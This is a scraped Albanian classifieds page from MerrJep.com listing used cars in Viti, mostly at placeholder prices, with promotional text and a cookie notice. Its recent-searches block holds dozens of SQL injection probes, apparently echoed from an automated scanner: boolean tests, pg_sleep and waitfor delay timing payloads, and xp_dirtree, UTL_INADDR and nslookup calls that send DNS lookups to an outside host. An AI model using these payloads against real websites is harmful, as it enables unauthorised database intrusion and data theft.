Viti | Makina

Ka shumë shpallje të reja në kategori të ndryshme që regjistrohen çdo ditë në MerrJep.com, pasi ne jemi reklamuesi më i madh në vend. Pavarësisht nëse jeni duke kërkuar me fjalë kyçe,kategori,ose vendndodhje Viti,MerrJep.com është vendi i duhur për ju sepse faqja jonë e internetit ka shumë përdorues dhe shumë shpallje të publikuara në shumë kategori të ndryshme.


Si hapësira më e madhe në internet për shit-blerje, MerrJep ju lejon të blini ose shisni në një mënyrë të thjeshtë dhe të lehtë! Shikoni të gjitha shpalljet bazuar në kërkimin tuaj Shitet Blihet Jepet me qera Kërkohet me qera | Viti ose regjistroni një shpallje tani duke treguar se çfarë është ajo që blini ose shisni dhe përdorni të gjitha avantazhet që vijnë nga të reklamuarit në MerrJep.com.

Sot 13:15
Linku:
,

Passat 2.0 TDI B8

13 100 EUR

Viti: 2018
Kilometrazha: 200 000 - 249 999

Sot 09:01 ,

Ecu(kompjutera) te VW SEAT SKODA AUDI

1 EUR

Viti: 2020
Kilometrazha: 0 - 4 999
10 Maj 15:36 ,

Citroen C3

1 EUR Price Reduced

Viti: 2011
Kilometrazha: 150 000 - 159 999
10 Maj 15:35 ,

Ford Focus 2.0 tdci 2011 nga zvicrra full opsion

1 EUR Price Reduced

Viti: 2011
Kilometrazha: 250 000 - 299 999
10 Maj 15:34 ,

VW passat, 2.0 tdi 4 MDSG, full opsion,170 hp

1 EUR

Viti: 2011
Kilometrazha: 150 000 - 159 999
10 Maj 15:34 ,

VW Golf 7,, 1.6 TDI, highline, full extra, me doganë

1 EUR Price Reduced

Viti: 2015
Kilometrazha: 180 000 - 189 999
10 Maj 15:34 ,

VW Passat

1 EUR Price Reduced

Viti: 2010
Kilometrazha: 200 000 - 249 999
10 Maj 15:33 ,

VW Passat

1 EUR Price Reduced

Viti: 2011
Kilometrazha: 200 000 - 249 999
09 Maj 18:42 ,

Shitet Mercedes E220 cdi 2012

1 EUR Price Reduced

Viti: 2012
Kilometrazha: 25 000 - 29 999
03 Maj 23:26 ,

opel corsa

1 EUR

Viti: 2000
Kilometrazha: 300 000 - 349 999
03 Maj 00:24 ,

Shitet

1 EUR

Viti: 2020
Kilometrazha: 30 000 - 34 999
15 Pri 19:19 ,

PIKAP CITROEN BERLINGO 2006

1 EUR

Viti: 2006
Kilometrazha: 250 000 - 299 999
14 Pri 17:35 ,

Mercedes 250

1 EUR

Viti: 1987
Kilometrazha: 200 000 - 249 999
12 Pri 22:11 ,

She's ose bej ndrrim

1 EUR

Viti: 2002
Kilometrazha: 40 000 - 44 999
08 Pri 08:36 ,

shitet

1 EUR

Viti: 2011
Kilometrazha: 10 000 - 14 999
03 Pri 21:47 ,

Shes golf 6 karavan 1.6 dizel viti 2011 info:045274631

1 EUR

Viti: 2011
Kilometrazha: 140 000 - 149 999
01 Pri 11:57 ,

Motorr per opell

1 EUR

Viti: 2001
Kilometrazha: 15 000 - 19 999
20 Mar 19:04 ,

Audi q5

1 EUR

Viti: 2012
Kilometrazha: 200 000 - 249 999
20 Mar 19:03 ,

Audi Q5

1 EUR

Viti: 2012
Kilometrazha: 200 000 - 249 999
06 Mar 22:11 ,

Shitet Peugeot 307 disell

1 EUR

Viti: 2008
Kilometrazha: 190 000 - 199 999
05 Mar 15:50 ,

Ushit

1 EUR Price Reduced

Viti: 1998
Kilometrazha: 0 - 4 999
02 Mar 18:53 ,

Shitet Peugeot 307 disell 2008

1 EUR

Viti: 2008
Kilometrazha: 190 000 - 199 999
02 Mar 16:05 ,

U SHITTTTT E GEZOFT PRONARI RI

1 EUR

Viti: 2002
Kilometrazha: 20 000 - 24 999
26 Shk 03:08 ,

shes opel combo 219km

1 EUR

Viti: 2006
Kilometrazha: 20 000 - 24 999
19 Shk 16:24 ,

Shes Peugeot 307 dizell 2008

1 EUR

Viti: 2008
Kilometrazha: 200 000 - 249 999
17 Shk 22:43 ,

Golf 6 2.0 Tdi

1 EUR

Viti: 2009
Kilometrazha: 200 000 - 249 999
15 Shk 20:44 ,

Shes Peugeot 307 dizell 2008

1 EUR

Viti: 2008
Kilometrazha: 200 000 - 249 999
15 Shk 19:45 ,

Golf 6

1 EUR

Viti: 2009
Kilometrazha: 200 000 - 249 999
11 Shk 20:55 ,

Shes Peugeot 307 dizell

1 EUR

Viti: 2008
Kilometrazha: 200 000 - 249 999
09 Shk 18:25 ,

U SHITTTTT E GEZOFT PRONARI RI

1 EUR

Viti: 2001
Kilometrazha: 10 000 - 14 999
09 Shk 14:02 ,

Shes peugeot 307 dizell 2008

1 EUR

Viti: 2008
Kilometrazha: 200 000 - 249 999
06 Shk 11:33 ,

Shes Veturen Mercedes - Gjendje shume te mire

1 EUR

Viti: 1988
Kilometrazha: 250 000 - 299 999
02 Shk 09:26 ,

Shes Citroen C4 2.0 Hdi Rks Mundsi Ndrrimi

1 EUR

Viti: 2005
Kilometrazha: 170 000 - 179 999
02 Shk 09:26 ,

Shes Golf 6 2.0 Tdi Rks Mundsi Ndrrimi

1 EUR

Viti: 2009
Kilometrazha: 200 000 - 249 999
02 Shk 09:14 ,

Shes Golf 6 2.0 Tdi Mundsi Ndrrimi

1 EUR

Viti: 2009
Kilometrazha: 200 000 - 249 999
01 Shk 01:56 ,

Shitet

1 EUR

Viti: 2008
Kilometrazha: 170 000 - 179 999
28 Jan 17:58 ,

Shitet Vektra

1 EUR

Viti: 1994
Kilometrazha: 0 - 4 999
25 Jan 19:52 ,

Golf 6 2.0 Tdi

1 EUR

Viti: 2009
Kilometrazha: 200 000 - 249 999
09 Jan 22:17 ,

Golf 6 2.0 Tdi Rks

1 EUR

Viti: 2009
Kilometrazha: 200 000 - 249 999
09 Jan 22:17 ,

Citroen C4 2.0 Hdi Rks

1 EUR

Viti: 2005
Kilometrazha: 180 000 - 189 999
09 Jan 22:08 ,

Golf 6 2.0 Tdi

1 EUR

Viti: 2009
Kilometrazha: 200 000 - 249 999
07 Jan 18:20 ,

Citroen C4 2.0 Hdi Rks

1 EUR

Viti: 2005
Kilometrazha: 190 000 - 199 999

MerrJep.com- Tregu më i madh për shit-blerje në internet!


MerrJep.com plotëson bazën e të dhënave me një numër në rritje të shpalljeve në baza ditore! Shumë individë dhe kompani shesin produktet dhe shërbimet e tyre përmes MerrJep.com.


Numri i lartë i vizitave në faqen e internetit, funksionalitetet e faqes, shërbime të shkëlqyera, mbështetje ndaj klientit, çmime të shkëlqyera dhe oferta speciale për kompanitë, janë vetëm një pjesë e arsyeve pse shumë përdorues në të gjithë vendin dhe jashtë tij, kanë MerrJep si zgjedhjen e tyre të parë për platformë reklamuese për shitjen e produkteve ose shërbimeve të tyre, ose kur kërkojnë të blejnë një lloj produkti ose shërbimi.Këtu mund të gjeni shumë produkte të përdorura, por gjithashtu edhe shumë produkte të reja dhe shumë shërbime të ndryshme.


MerrJep është vendi ideal nëse dëshironi të blini, shisni Vetura, Traktorë, Motoçikleta, Campers, Ekskavatorë, Forkliftë, Banesa, Vila, Parcela ndërtimi, Frigoriferë, Soba elektrike, Ngrohësa, Shporeta druri, Mjete, Materiale Ndërtimi, Laptopë ose nëse dëshironi të gjeni Punë apo shërbime në Përkthime dhe shumë e shumë lloje të tjera shpalljesh.


Pjesë e kompanive që reklamojnë produktet dhe shërbimet e tyre në MerrJep.com janë Agjensioni Holding, PRO REAL ESTATE, Delta Patundshmëri, Meti Patundshmëri, Auto Sallon Erdi, UD Motors, TechPoint, EGS Prishtina, Mobi Shop Raqi, Pet Store Prishtina dhe shumë e shumë biznese të tjera ofrojnë produktet dhe shërbimet e tyre për audiencën e madhe të MerrJep.com.


Më shumë se 1.000.000 shpallje janë duke u prezantuar në MerrJep.com! Këtu, ju mund të gjeni realisht gjithçka! Shitja e veturave, marrja me qira e banesave, shitja e pasurive të patundshme, teknikë të bardhë, kafshë shtëpiake, mekanizim bujqësor, makineri lidhëse, motorë, makina ndërtimi, dyer dhe dritare PVC, instrumente muzikore, veshje dhe shumë gjëra të tjera, po reklamohen në Merrjep.com në baza ditore!


Shitja dhe Blerja në MerrJep.com


Nëse, gjatë kërkimin tuaj | Shitet Blihet Jepet me qera Kërkohet me qera | Viti juve nuk ju shfaqen rezultate të përshtatshme, ju rekomandojmë të regjistroni një shpallje me të cilën do të merrni një ofertë për ato që blini ose shisni. Nëse jeni të interesuar të blini, regjistroni një shpallje me titull "Blej (emri i produktit për të cilin dëshironi të merrni një ofertë)", ose hidhni një vështrim të gjitha shpalljeve aktive sipas interesit tuaj.


Nëse po shisni diçka, regjistroni një shpallje me titull "Në shitje (emri i produktit që jeni duke shitur)", dhe prisni që të kontaktohen nga blerësit potencialisht të interesuar.


Pavarësisht nëse jeni duke shitur apo blerë - MerrJep.com është vendi i duhur për ju!


Me një audiencë që rritet vazhdimisht në baza ditore, MerrJep.com me siguri do t'ju ndihmojë të blini lehtë dhe të shisni në një mënyrë TË LEHTË, TË THJESHTË dhe TË SHPEJTË!


Polo Golf 5 Vetura Mercedes Passat 3c Opel combo Ford Opel vektra bmx Audi 100 1 Ww caddy Benzin Pikapa Mercedes 220 automatik Golf Seat cordoba Shes blej mercedez 190 Ford focus Gollfe6 toyta Seat leon Golf 3 Audi a4 Benzin 2005 mercedez dizell 190 Citroen c4 kombi mercedes sprinter SEAT ibiza golf.4 pacifik Pas 218' -1' OR 2+868-868-1=0+0+0+1 -- -1' OR 3+868-868-1=0+0+0+1 -- -1' OR 3*2<(0+5+868-868) -- -1' OR 3*2>(0+5+868-868) -- -1 OR 2+880-880-1=0+0+0+1 -- -1 OR 3+880-880-1=0+0+0+1 -- -1 OR 3*2<(0+5+880-880) -- -1 OR 3*2>(0+5+880-880) -- -1 OR 2+134-134-1=0+0+0+1 -1 OR 3+134-134-1=0+0+0+1 -1 OR 3*2<(0+5+134-134) -1 OR 3*2>(0+5+134-134) audia4 Autosallon bini -1 OR 3*2>(0+5+654-654) -- -1 OR 3*2<(0+5+654-654) -- -1 OR 3+654-654-1=0+0+0+1 -- -1 OR 2+654-654-1=0+0+0+1 -- 286' 1';copy (select '') to program 'nslookup dns.sqli.\013405.15404-110135.15404.a34e1.\1.bxss.me 1;copy (select '') to program 'nslookup dns.sqli.\013405.15404-110132.15404.a34e1.\1.bxss.me' 1');EXEC master..xp_dirtree '\\dns.sqli.013405.15404-110128.15404.a34e1.1.bxss.me\' -- 1';EXEC master..xp_dirtree '\\dns.sqli.013405.15404-110124.15404.a34e1.1.bxss.me\' -- 1;EXEC master..xp_dirtree '\\dns.sqli.013405.15404-110121.15404.a34e1.1.bxss.me\' -- '||UTL_INADDR.get_host_address('dns.'||'sqli.013405.15404-110120.15404.a34e1.1.bxss'||'.me')||' 1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.15404-110118.15404.a34e1.1.bxss'||'.me') Te8eV7d5'));select pg_sleep(166); -- BouPXCOn');select pg_sleep(498); -- F5pqkmKe';select pg_sleep(498); -- -1));select pg_sleep(498); -- -1);select pg_sleep(498); -- -1;select pg_sleep(498); -- Rr4SDcxN')); waitfor delay '0:0:332' -- uqX6pVNm'); waitfor delay '0:0:166' -- HVu1jlsO'; waitfor delay '0:0:166' -- 1 waitfor delay '0:0:498' -- -1)); waitfor delay '0:0:498' -- -1); waitfor delay '0:0:498' -- -1; waitfor delay '0:0:332' -- (0+5+429-429)----" style="display: inline-block" target="_blank" rel="noopener">-1" OR 3*2>(0+5+429-429) -- -1" OR 3*2<(0+5+429-429) -- -1" OR 3+429-429-1=0+0+0+1 -- -1" OR 2+429-429-1=0+0+0+1 -- -1' OR 3*2>(0+5+445-445) or 'j774rUWB'=' -1' OR 3*2<(0+5+445-445) or 'j774rUWB'=' -1' OR 3+445-445-1=0+0+0+1 or 'j774rUWB'=' -1' OR 2+445-445-1=0+0+0+1 or 'j774rUWB'=' -1' OR 3*2>(0+5+408-408) -- -1' OR 3*2<(0+5+408-408) -- -1' OR 3+408-408-1=0+0+0+1 -- -1' OR 2+408-408-1=0+0+0+1 -- -1 OR 3*2>(0+5+398-398) -1 OR 3*2<(0+5+398-398) -1 OR 3+398-398-1=0+0+0+1 -1 OR 2+398-398-1=0+0+0+1 -1 OR 3*2>(0+5+114-114) -- -1 OR 3*2<(0+5+114-114) -- -1 OR 3+114-114-1=0+0+0+1 -- -1 OR 2+114-114-1=0+0+0+1 -- 344' 1';copy (select '') to program 'nslookup dns.sqli.\013405.15404-110065.15404.a34e1.\1.bxss.me 1;copy (select '') to program 'nslookup dns.sqli.\013405.15404-110063.15404.a34e1.\1.bxss.me' 1');EXEC master..xp_dirtree '\\dns.sqli.013405.15404-110058.15404.a34e1.1.bxss.me\' -- 1';EXEC master..xp_dirtree '\\dns.sqli.013405.15404-110056.15404.a34e1.1.bxss.me\' -- 1;EXEC master..xp_dirtree '\\dns.sqli.013405.15404-110053.15404.a34e1.1.bxss.me\' -- '||UTL_INADDR.get_host_address('dns.'||'sqli.013405.15404-110051.15404.a34e1.1.bxss'||'.me')||' 1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.15404-110049.15404.a34e1.1.bxss'||'.me')

Në fillim

Uebfaqja jonë përdor Cookies për të përmirësuar eksperiencën tuaj në shfletimin e faqes. Duke klikuar "Unë pajtohem" ose duke vazhduar me përdorimin e uebfaqes, ju pajtoheni me përdorimin e Cookies. Nëse ju nuk pajtoheni, ju mund t'i ndryshoni parametrat e kërkimit në shfletuesin tuaj.

Më shumë informacione